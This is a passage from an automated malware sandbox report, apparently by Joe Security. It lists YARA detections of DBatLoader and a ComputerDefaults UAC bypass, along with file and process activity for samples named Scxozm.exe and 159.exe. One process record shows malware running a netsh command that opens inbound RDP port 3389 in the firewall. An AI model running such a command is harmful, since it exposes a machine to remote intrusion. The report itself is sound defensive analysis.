Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380595904.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370715330.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348107526.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345903772.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371123800.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359846058.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000002.397446060.0000000004EC4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359586055.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370334350.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.383808862.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376129286.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.351883297.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370078790.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.381933671.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371891906.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.352519875.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347162562.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.349151277.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000000.329185025.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.357072793.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360432141.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372626910.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384380520.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347421897.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345794360.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359443034.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369599572.0000000004E4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.357399917.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358763821.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356046142.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.379932274.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375094725.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347503563.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384217414.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356345549.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Scxozm.exe, Author: Joe Security

Antivirus matches: Detection: 38%, ReversingLabs

Reputation: low

File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 29942FC InternetOpen
crosoft\Windows\INetCache directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 29942FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Microsoft\Windows\History read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol

File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Mi 0 1024 fd 24 5a fd 39 fd fd fd fd $Z9557U~?W7W2: success or wait 357 29945B9 InternetReadFile

crosoft\Windows\INetCache\IE\2 fd fd fd 35 35 fd 82 fd fd <<88>,<88.CCQNUN
WF3MMUU\Scxozmyplhmqutylctxlkg fd fd fd fd fd 0a fd fd fd fd UNUo|UUtUUU.U^UUULU
lsugzstqx[1] fd fd fd fd fd fd fd fd fd fd UJU3UUUUN>U
fd fd fd fd fd fd fd fd fd fd xU/UPU/^UUxUU/UU2N
fd fd fd fd fd fd fd fd fd fd
fd fd 37 fd fd fd 55 fd fd fd
7e 3f 03 57 fd 37 16 03
57 1e 32 fd fd fd 3a 3c fd
fd 3c fd fd 57 38 38 fd 3e
fd 2c fd fd 3c fd 38 fd 38
fd 0e fd fd e5 2e fd fd 43
43 fd fd fd fd fd fd fd fd 8a
fd 51 16 4e eb 55 4e eb
55 4e eb 55 fd 6f 7c 55 fd
eb 55 fd fd 74 55 fd eb 55
fd fd fd 55 2e eb 55 fd fd
5e 55 fd eb 55 fd 17 fd 55
4c eb 55 fd 17 fd 55 4a
eb 55 fd 17 33 55 fd eb
55 fd 17 fd 55 fd eb 55 4e
fd 3e 55 78 6b 55 2f fd fd
55 50 eb 55 2f fd 5e 55 fd
eb 55 fd 01 78 55 fd eb
55 2f fd fd 55 fd eb 55 1c
fd fd 32 4e eb

File Read
File Path Offset Length Completion Count Source Address Symbol

C:\Users\Public\Libraries\Scxozm.exe unknown 818176 success or wait 1 4034F5 ReadFile

C:\Users\Public\Libraries\Scxozm.exe unknown 818176 success or wait 1 298311D ReadFile

Analysis Process: 159.exe PID: 5528, Parent PID: 3364

General
Target ID: 19

Start time: 15:51:31

Start date: 25/07/2022

Path: C:\Users\user\AppData\Local\Temp\159.exe

Wow64 process (32bit): true

Commandline: "C:\Users\user\AppData\Local\Temp\159.exe"

Imagebase: 0xd60000

File size: 72192 bytes

MD5 hash: CA96229390A0E6A53E8F2125F2C01114

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Antivirus matches: Detection: 100%, Avira

Detection: 31%, Metadefender, Browse
Detection: 85%, ReversingLabs

Reputation: low

Analysis Process: netsh.exe PID: 4672, Parent PID: 5528

General
Target ID: 20

Start time: 15:51:32

Start date: 25/07/2022

Path: C:\Windows\SysWOW64\netsh.exe

Wow64 process (32bit): true

Commandline: netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389

Imagebase: 0x13a0000

File size: 82944 bytes

MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807

Has elevated privileges: true

Has administrator true
privileges:

Programmed in: C, C++ or other language

Reputation: high

File Activities
File Path Access Attributes Options Completion Count Source Address Symbol

File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol

\Device\ConDrv 5 5 0d 0a success or wait 1 13A7B1B WriteFile

\Device\ConDrv 7 2 75 6e 6b 6e 6f 77 6e unknown success or wait 1 13A7B1B WriteFile

Analysis Process: conhost.exe PID: 6132, Parent PID: 4672

General
Target ID: 21

Start time: 15:51:32

Start date: 25/07/2022

Path: C:\Windows\System32\conhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Imagebase: 0x7ff647620000

File size: 625664 bytes

MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Reputation: high

Analysis Process: Scxozm.exe PID: 1384, Parent PID: 3616

General
Target ID: 22

Start time: 15:51:34

Start date: 25/07/2022

Path: C:\Users\Public\Libraries\Scxozm.exe

Wow64 process (32bit): true

Commandline: "C:\Users\Public\Libraries\Scxozm.exe"

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: Borland Delphi

Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000002.422414404.0000000004E07000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394075935.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370114665.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387124471.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.378007228.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397338070.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398107678.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000002.422007265.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393404052.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 66 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.373686381.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.407220167.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390379326.0000000004D0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383118429.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388544254.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398778273.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.373772928.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370451742.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388062879.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384360947.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412380843.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.379396536.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391906868.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390591636.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393899595.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393747645.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370535271.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.374560729.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383423241.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396634821.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404674093.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388211658.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388855935.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388923590.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384993781.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370350747.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400892511.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.403122724.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401121981.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400454276.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.380218201.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391110979.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389260437.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.379972211.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.385800327.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371177793.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388390517.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.409836652.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401551177.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.377465170.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371296732.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396147021.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000000.346993004.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.423063785.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371056323.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
Copyright Joe Security LLC 2022 Page 67 of 74
00000016.00000003.369819049.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386918501.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400731941.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412167968.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387720414.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388469578.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.392863466.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412264006.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404864210.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387639999.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394708025.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.369937246.0000000004C08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370709496.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387362144.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386135191.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371742531.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388122427.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383727813.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.392261954.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394983555.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370770459.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.375191292.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401796956.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.418767534.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404576835.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
